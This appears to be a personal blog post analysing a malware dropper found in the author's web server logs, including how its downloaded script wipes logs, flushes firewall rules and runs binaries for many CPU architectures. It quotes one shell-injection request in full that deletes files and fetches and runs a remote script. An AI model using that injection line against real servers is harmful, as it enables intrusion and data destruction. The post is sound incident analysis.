That’s a win for portability I guess
I was looking though my webserver logs and saw this:
GET /bin/zhttpd/${IFS}cd${IFS}/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://redacted/l.sh;${IFS}sh${IFS}l.sh;
Okay, I guess it’s trying to exploit some extremely straightforward shell
injection in a web server. Fair enough. But I got curious: what does this l.sh
payload does?
Well, I downloaded it. It:
- Force-removes
/tmp/and/var/log - Tries to cd into various directories (including
/tmp/that it just deleted) - Tries to run a payload from the Web, first by doing
expl <URL>(I guess that
only works on an already infected system), and falling back to downloading the
payload URL withcurl, renaming it (with cat src > dest for some reason),
chmoding it, and finally executing it. - Runs
iptables -Fwhich drops iptables rules (but keeps the default policy
active IIRC, so if you have a firewall configured, at this point all input,
and possibly output traffic will be blocked) - Adds a couple of iptables rules to block input traffic on some random ports
- Runs
iptable-savewithout option, which does not save anything but prints
the current iptables rules.
So all of this is pretty weird, but the weirdest part is the payload. It
actually tries to run multiple payloads, each with a different architecture, in
the following order:
- i486
- i686
- x86
- mips
- mpsl
- arm4
- arm5
- arm6
- arm7
- ppc
- m68k
- sh4
- x86_64
… MIPS ? 68000 ? SH-4 ? Really ? Yes, really. I downloaded most of them, and
file confirms that they are executables for the corresponding architectures.
(I didn’t investigate further.)
So I guess the morale of this story is: Don’t rely on the fact that you’re
running Linux on weird old hardware (like, say, a 90s Pocket PC or a Dreamcast)
to save you from malware :)